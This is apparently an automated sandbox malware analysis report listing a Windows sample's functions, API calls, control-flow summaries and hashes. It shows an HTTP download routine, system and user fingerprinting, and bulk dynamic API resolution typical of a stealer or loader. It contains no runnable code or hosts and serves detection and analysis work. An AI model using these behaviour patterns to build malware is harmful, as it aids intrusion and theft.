                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: efb7fa67f3413938bbbb1812eac62ca20a030de0e89dbf8c9d66c1f190ee94fb
                                    • Instruction ID: c54efcf8649bb9d7288f2293cf56bb811c089928c054cefa4a96cf78acceabd5
                                    • Opcode Fuzzy Hash: efb7fa67f3413938bbbb1812eac62ca20a030de0e89dbf8c9d66c1f190ee94fb
                                    • Instruction Fuzzy Hash: 8F41F2617C2708EAC634B7B4A84DEAD77966F83740FA07AE0FB0453290CBB0656855A5
                                    Function 00BD62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 bd62d0-bd635b call beaab0 call bd4800 call beaa50 InternetOpenA StrCmpCA 1040 bd635d 1033->1040 1041 bd6364-bd6368 1033->1041 1040->1041 1042 bd636e-bd6392 InternetConnectA 1041->1042 1043 bd6559-bd6575 call beaab0 call beab10 * 2 1041->1043 1044 bd654f-bd6553 InternetCloseHandle 1042->1044 1045 bd6398-bd639c 1042->1045 1061 bd6578-bd657d 1043->1061 1044->1043 1047 bd639e-bd63a8 1045->1047 1048 bd63aa 1045->1048 1050 bd63b4-bd63e2 HttpOpenRequestA 1047->1050 1048->1050 1052 bd63e8-bd63ec 1050->1052 1053 bd6545-bd6549 InternetCloseHandle 1050->1053 1056 bd63ee-bd640f InternetSetOptionA 1052->1056 1057 bd6415-bd6455 HttpSendRequestA HttpQueryInfoA 1052->1057 1053->1044 1056->1057 1059 bd647c-bd649b call be8ad0 1057->1059 1060 bd6457-bd6477 call beaa50 call beab10 * 2 1057->1060 1066 bd649d-bd64a4 1059->1066 1067 bd6519-bd6539 call beaa50 call beab10 * 2 1059->1067 1060->1061 1070 bd6517-bd653f InternetCloseHandle 1066->1070 1071 bd64a6-bd64d0 InternetReadFile 1066->1071 1067->1061 1070->1053 1076 bd64db 1071->1076 1077 bd64d2-bd64d9 1071->1077 1076->1070 1077->1076 1080 bd64dd-bd6515 call beacc0 call beabb0 call beab10 1077->1080 1080->1071
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BD4889
                                      • Part of subcall function 00BD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BD4899
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • InternetOpenA.WININET(00BF0DFF,00000001,00000000,00000000,00000000), ref: 00BD6331
                                    • StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD6353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD6385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,018BE208,00000000,00000000,00400100,00000000), ref: 00BD63D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BD640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD6421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BD644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BD64BD
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD6549
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD6553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 796e588fe414e66f6982d60c19dc250e9acaf8418bfb94b87bd1cace653b91bb
                                    • Instruction ID: d7d6ddbd8057a324c595a4755afb8006f2e1d848b6fc586100dcfddbb34815ef
                                    • Opcode Fuzzy Hash: 796e588fe414e66f6982d60c19dc250e9acaf8418bfb94b87bd1cace653b91bb
                                    • Instruction Fuzzy Hash: 71715F71A00218EFDB14DFA5DC55BEEB7B8EB54700F1040D9F10A6B290DB746A84CF51
                                    Function 00BE7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 be7690-be76da GetWindowsDirectoryA 1357 be76dc 1356->1357 1358 be76e3-be7757 GetVolumeInformationA call be8e90 * 3 1356->1358 1357->1358 1365 be7768-be776f 1358->1365 1366 be778c-be77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 be7771-be778a call be8e90 1365->1367 1368 be77b8-be77e8 wsprintfA call beaa50 1366->1368 1369 be77a9-be77b6 call beaa50 1366->1369 1367->1365 1377 be780e-be781e 1368->1377 1369->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BE76D2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BE770F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7793
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE779A
                                    • wsprintfA.USER32 ref: 00BE77D0
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 0ff8df96ef8c9cc18a795bf71a1b2aafd934d95c095d783ffbbcb42a3f7a2f7a
                                    • Instruction ID: f09acd70ad4a40cdba368a2e07ea1c2550fcab6883b9944046bb70f62c215f2e
                                    • Opcode Fuzzy Hash: 0ff8df96ef8c9cc18a795bf71a1b2aafd934d95c095d783ffbbcb42a3f7a2f7a
                                    • Instruction Fuzzy Hash: 384181B1D442889FDB10DB95CC85BEEBBB8AF09704F1001D9F609BB280DB746A44CBA5
                                    Function 00BE79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BD11B7), ref: 00BE7A10
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7A17
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BE7A2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 0f2e49ea14120e265a1f02c5704913ce5faa1714e553590a64ba759378d39907
                                    • Instruction ID: 2b4334b819cada17edbad5ef25be765a5bbaeff9635de655157285aef936cde5
                                    • Opcode Fuzzy Hash: 0f2e49ea14120e265a1f02c5704913ce5faa1714e553590a64ba759378d39907
                                    • Instruction Fuzzy Hash: 87F0C2B2948209EFCB00CF89DC45BAEFFB8FB49711F10025AFA05A3690C7B42504CBA0
                                    Function 00BD1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 72930a09030cbbbdd64330b7721236c8dbdc6dfa0c70e0ff54b188f36e80819b
                                    • Instruction ID: 7fc24789ebf87f489e54c688fc1d92d13f2cc1cfa50866147968831d31b25485
                                    • Opcode Fuzzy Hash: 72930a09030cbbbdd64330b7721236c8dbdc6dfa0c70e0ff54b188f36e80819b
                                    • Instruction Fuzzy Hash: A5D05E7490530CAFCB04DFE19C496DDBBB8FB0D215F000595D90572340EA306445CB65
                                    Function 00BE9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 be9f20-be9f2a 634 bea346-bea3da LoadLibraryA * 8 633->634 635 be9f30-bea341 GetProcAddress * 43 633->635 636 bea3dc-bea451 GetProcAddress * 5 634->636 637 bea456-bea45d 634->637 635->634 636->637 638 bea526-bea52d 637->638 639 bea463-bea521 GetProcAddress * 8 637->639 640 bea52f-bea5a3 GetProcAddress * 5 638->640 641 bea5a8-bea5af 638->641 639->638 640->641 642 bea647-bea64e 641->642 643 bea5b5-bea642 GetProcAddress * 6 641->643 644 bea72f-bea736 642->644 645 bea654-bea72a GetProcAddress * 9 642->645 643->642 646 bea738-bea7ad GetProcAddress * 5 644->646 647 bea7b2-bea7b9 644->647 645->644 646->647 648 bea7ec-bea7f3 647->648 649 bea7bb-bea7e7 GetProcAddress * 2 647->649 650 bea825-bea82c 648->650 651 bea7f5-bea820 GetProcAddress * 2 648->651 649->648 652 bea922-bea929 650->652 653 bea832-bea91d GetProcAddress * 10 650->653 651->650 654 bea98d-bea994 652->654 655 bea92b-bea988 GetProcAddress * 4 652->655 653->652 656 bea9ae-bea9b5 654->656 657 bea996-bea9a9 GetProcAddress 654->657 655->654 658 beaa18-beaa19 656->658 659 bea9b7-beaa13 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,018A61B0), ref: 00BE9F3D
                                    • GetProcAddress.KERNEL32(74DD0000,018A6410), ref: 00BE9F55
                                    • GetProcAddress.KERNEL32(74DD0000,018B9480), ref: 00BE9F6E
                                    • GetProcAddress.KERNEL32(74DD0000,018B9408), ref: 00BE9F86
                                    • GetProcAddress.KERNEL32(74DD0000,018B93D8), ref: 00BE9F9E
                                    • GetProcAddress.KERNEL32(74DD0000,018B93F0), ref: 00BE9FB7
                                    • GetProcAddress.KERNEL32(74DD0000,018ABEE8), ref: 00BE9FCF
                                    • GetProcAddress.KERNEL32(74DD0000,018BCEE0), ref: 00BE9FE7
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD60), ref: 00BEA000
                                    • GetProcAddress.KERNEL32(74DD0000,018BCDA8), ref: 00BEA018
                                    • GetProcAddress.KERNEL32(74DD0000,018BCCD0), ref: 00BEA030
                                    • GetProcAddress.KERNEL32(74DD0000,018A61D0), ref: 00BEA049
                                    • GetProcAddress.KERNEL32(74DD0000,018A62B0), ref: 00BEA061
                                    • GetProcAddress.KERNEL32(74DD0000,018A6210), ref: 00BEA079
                                    • GetProcAddress.KERNEL32(74DD0000,018A6250), ref: 00BEA092
                                    • GetProcAddress.KERNEL32(74DD0000,018BCCE8), ref: 00BEA0AA
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD78), ref: 00BEA0C2
                                    • GetProcAddress.KERNEL32(74DD0000,018ABE98), ref: 00BEA0DB
                                    • GetProcAddress.KERNEL32(74DD0000,018A6290), ref: 00BEA0F3
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD48), ref: 00BEA10B
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD90), ref: 00BEA124
                                    • GetProcAddress.KERNEL32(74DD0000,018BCE20), ref: 00BEA13C
                                    • GetProcAddress.KERNEL32(74DD0000,018BCDC0), ref: 00BEA154
                                    • GetProcAddress.KERNEL32(74DD0000,018A62F0), ref: 00BEA16D
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD00), ref: 00BEA185
                                    • GetProcAddress.KERNEL32(74DD0000,018BCE68), ref: 00BEA19D
                                    • GetProcAddress.KERNEL32(74DD0000,018BCF10), ref: 00BEA1B6
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD18), ref: 00BEA1CE
                                    • GetProcAddress.KERNEL32(74DD0000,018BCEC8), ref: 00BEA1E6
                                    • GetProcAddress.KERNEL32(74DD0000,018BCC28), ref: 00BEA1FF
                                    • GetProcAddress.KERNEL32(74DD0000,018BCEF8), ref: 00BEA217
                                    • GetProcAddress.KERNEL32(74DD0000,018BCE98), ref: 00BEA22F
                                    • GetProcAddress.KERNEL32(74DD0000,018BCD30), ref: 00BEA248
                                    • GetProcAddress.KERNEL32(74DD0000,018BA628), ref: 00BEA260
                                    • GetProcAddress.KERNEL32(74DD0000,018BCDD8), ref: 00BEA278
                                    • GetProcAddress.KERNEL32(74DD0000,018BCCA0), ref: 00BEA291
                                    • GetProcAddress.KERNEL32(74DD0000,018A6350), ref: 00BEA2A9
                                    • GetProcAddress.KERNEL32(74DD0000,018BCDF0), ref: 00BEA2C1
                                    • GetProcAddress.KERNEL32(74DD0000,018A5F30), ref: 00BEA2DA
                                    • GetProcAddress.KERNEL32(74DD0000,018BCCB8), ref: 00BEA2F2
                                    • GetProcAddress.KERNEL32(74DD0000,018BCE80), ref: 00BEA30A
                                    • GetProcAddress.KERNEL32(74DD0000,018A5DF0), ref: 00BEA323
                                    • GetProcAddress.KERNEL32(74DD0000,018A6050), ref: 00BEA33B
                                    • LoadLibraryA.KERNEL32(018BCE08,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA34D
                                    • LoadLibraryA.KERNEL32(018BCC70,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA35E
                                    • LoadLibraryA.KERNEL32(018BCC40,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA370
                                    • LoadLibraryA.KERNEL32(018BCC58,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA382
                                    • LoadLibraryA.KERNEL32(018BCE38,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA393
                                    • LoadLibraryA.KERNEL32(018BCC88,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA3A5
                                    • LoadLibraryA.KERNEL32(018BCE50,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA3B7
                                    • LoadLibraryA.KERNEL32(018BCEB0,?,00BE5EF3,00BF0AEB,?,?,?,?,?,?,?,?,?,?,00BF0AEA,00BF0AE7), ref: 00BEA3C8
                                    • GetProcAddress.KERNEL32(75290000,018A5EF0), ref: 00BEA3EA
                                    • GetProcAddress.KERNEL32(75290000,018BD090), ref: 00BEA402
                                    • GetProcAddress.KERNEL32(75290000,018B8D10), ref: 00BEA41A
                                    • GetProcAddress.KERNEL32(75290000,018BD0C0), ref: 00BEA433
                                    • GetProcAddress.KERNEL32(75290000,018A5DB0), ref: 00BEA44B
                                    • GetProcAddress.KERNEL32(734C0000,018ABFD8), ref: 00BEA470
                                    • GetProcAddress.KERNEL32(734C0000,018A5FD0), ref: 00BEA489
                                    • GetProcAddress.KERNEL32(734C0000,018ABF10), ref: 00BEA4A1
                                    • GetProcAddress.KERNEL32(734C0000,018BCF40), ref: 00BEA4B9
                                    • GetProcAddress.KERNEL32(734C0000,018BD1F8), ref: 00BEA4D2
                                    • GetProcAddress.KERNEL32(734C0000,018A5C90), ref: 00BEA4EA
                                    • GetProcAddress.KERNEL32(734C0000,018A5CF0), ref: 00BEA502
                                    • GetProcAddress.KERNEL32(734C0000,018BD018), ref: 00BEA51B
                                    • GetProcAddress.KERNEL32(752C0000,018A5D10), ref: 00BEA53C
                                    • GetProcAddress.KERNEL32(752C0000,018A5ED0), ref: 00BEA554
                                    • GetProcAddress.KERNEL32(752C0000,018BD060), ref: 00BEA56D
                                    • GetProcAddress.KERNEL32(752C0000,018BCFB8), ref: 00BEA585
                                    • GetProcAddress.KERNEL32(752C0000,018A5CD0), ref: 00BEA59D
                                    • GetProcAddress.KERNEL32(74EC0000,018ABD30), ref: 00BEA5C3
                                    • GetProcAddress.KERNEL32(74EC0000,018ABF60), ref: 00BEA5DB
                                    • GetProcAddress.KERNEL32(74EC0000,018BCFD0), ref: 00BEA5F3
                                    • GetProcAddress.KERNEL32(74EC0000,018A5E50), ref: 00BEA60C
                                    • GetProcAddress.KERNEL32(74EC0000,018A5F10), ref: 00BEA624
                                    • GetProcAddress.KERNEL32(74EC0000,018ABC90), ref: 00BEA63C
                                    • GetProcAddress.KERNEL32(75BD0000,018BD1C8), ref: 00BEA662
